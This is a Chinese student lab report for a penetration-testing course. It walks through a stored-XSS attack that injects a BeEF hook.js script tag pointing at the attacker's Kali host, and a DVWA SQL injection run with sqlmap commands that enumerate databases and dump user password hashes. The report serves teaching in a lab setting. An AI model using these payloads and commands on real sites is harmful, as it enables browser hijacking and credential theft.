网络渗透实验三

1.实验目的和要求

实验目的：了解什么是XSS；了解XSS攻击实施，理解防御XSS攻击的方法；了解SQL注入的基本原理；掌握PHP脚本访问MySQL数据库的基本方法；掌握程序设计中避免出现SQL注入漏洞的基本方法；掌握网站配置。

系统环境：Kali Linux 2、Windows Server

网络环境：交换网络结构

实验工具： Beef；AWVS(Acunetix Web Vulnarability Scanner);SqlMAP；DVWA

2.实验步骤

XSS部分：利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。

角色：留言簿网站。存在XSS漏洞；（IIS或Apache、guestbook搭建）

攻击者：Kali（使用beeF生成恶意代码，并通过留言方式提交到留言簿网站）；

被攻击者：访问留言簿网站，浏览器被劫持。

1.利用AWVS扫描留言簿网站（安装见参考文档0.AWVS安装与使用.docx），发现其存在XSS漏洞，截图。

2.Kali使用beef生成恶意代码，截图。

3.访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板，

<script src="http://Kali的IP地址:3000/hook.js"></script>，截图。

4.管理员登录login.htm，账号密码均为admin，审核用户留言。只要客户端访问这个服务器的留言板，客户端浏览器就会被劫持，指定被劫持网站为学校主页，将你在beff中的配置截图。

5.回答问题：实验中XSS攻击属于哪种类型？

XSS（跨站脚本攻击）是一种常见的网络安全漏洞，它属于Web应用程序中的一类攻击方式。具体而言，它是通过在受信任的网站上注入恶意脚本来实现的，当用户访问该网站时，恶意脚本会被执行，从而导致攻击者能够获取用户的敏感信息或执行其他恶意操作。

XSS攻击通常分为三种类型：

1.存储型XSS攻击：攻击者将恶意脚本存储在目标网站的数据库中，当其他用户访问该页面时，恶意脚本会从数据库中加载并执行。

2.反射型XSS攻击：攻击者将恶意脚本作为参数插入到目标网址中，当用户点击包含恶意脚本的链接时，网站会将恶意脚本作为响应返回给用户并执行。

3.DOM-based XSS攻击：攻击者利用网页中的DOM（文档对象模型）操作漏洞，将恶意脚本注入到网页中，从而实现攻击目的。

为了防止XSS攻击，开发人员需要对输入数据进行严格的验证和过滤，确保用户提供的内容不会被当做代码执行。同时，网站应该采用安全编码实践，并使用适当的防御机制，如输入验证、输出编码和内容安全策略（Content Security Policy）等。

SQL注入部分：DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。虚拟机账号和密码均为：msfadmin。然后，ifconfig获取虚拟机IP地址，然后再火狐浏览器上打开IP地址，然后进入DVWA中，DVWA的账号为：admin，密码为：password。

1.注入点发现。首先肯定是要判断是否有注入漏洞。

在输入框输入1，返回

ID: 1

First name: admin

Surname: admin

返回正常；

再次输入1'，报错，返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

此时可以断定有SQL注入漏洞，

下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低；

2.枚举当前使用的数据库名称和用户名。

进入DWVA后，现在左边的选项中找到DVWA Security，将其设置成low，然后在左侧选项SQL Injection上设置注入点22。

然后用F12获取cookie值

然后即可进行以下指令

格式：sqlmap -u "DWVA的URL" --cookie='security=low; PHPSESSID=DWVA的cookie值' -b --current-db --current-user

输入命令：sqlmap -u "http://192.168.22.137/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=92342192a73d76f5ac2404a07208512d' -b --current-db --current-user

Sqlmap输出截图。

得到user：root@%     database：dvwa

3.枚举数据库用户名和密码

格式：sqlmap -u "DWVA的URL" --cookie='security=low; PHPSESSID=DWVA的cookie值' --string="Surname" --users --password

输入命令：sqlmap -u "http://192.168.22.137/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=92342192a73d76f5ac2404a07208512d' --string="Surname" --users --password

Sqlmap输出截图。

4.枚举数据库

--dbs：枚举当前数据库

格式：sqlmap -u "DWVA的URL" --cookie='security=low; PHPSESSID=DWVA的cookie值' --string="Surname" --dbs

输入命令：sqlmap -u "http://192.168.22.137/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=92342192a73d76f5ac2404a07208512d' --string="Surname" --dbs

Sqlmap输出截图。

5.枚举数据库和指定数据库的数据表

 -D 数据库名：指定数据库

--tables：枚举指定数据库的所有表

格式：sqlmap -u "DWVA的URL" --cookie='security=low; PHPSESSID=DWVA的cookie值' --string="Surname" -D dvwa --tables

输入命令：sqlmap -u "http://192.168.22.137/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=92342192a73d76f5ac2404a07208512d' --string="Surname" -D dvwa --tables

Sqlmap输出截图。

6.获取指定数据库和表中所有列的信息

-D：指定的数据库

-T：指定数据库中的数据表

--columns：获取列的信息

格式：sqlmap -u "DWVA的URL" --cookie='security=low; PHPSESSID=DWVA的cookie值' --string="Surname" -D dvwa -T users --columns

输入命令：sqlmap -u "http://192.168.22.137/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=92342192a73d76f5ac2404a07208512d' --string="Surname" -D dvwa -T users --columns

Sqlmap输出截图。

7.枚举指定数据表中的所有用户名与密码,并down到本地。

-C：枚举数据表中的列

--dump：存储数据表项

格式：sqlmap -u "DWVA的URL" --cookie='security=low; PHPSESSID=DWVA的cookie值' --string="Surname" -D dvwa -T users -C user,password --dump

输入命令：sqlmap -u "http://192.168.22.137/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=92342192a73d76f5ac2404a07208512d' --string="Surname" -D dvwa -T users -C user,password --dump

Sqlmap输出截图。

查看down到本地的用户名与密码，截图。（提示带.的文件夹为隐藏，在图形命令下，用文件浏览器打开文件夹，按下ctrl+h组合键可显示隐藏文件合文件夹，再按一次取消显示。）

3.实验小结

在本次试验中了解了一些AWVS的使用和XSS的原理以及运用，同时也学习到了一些SQL注入的原理和指令，加深了对kali虚拟机工具的熟练运用。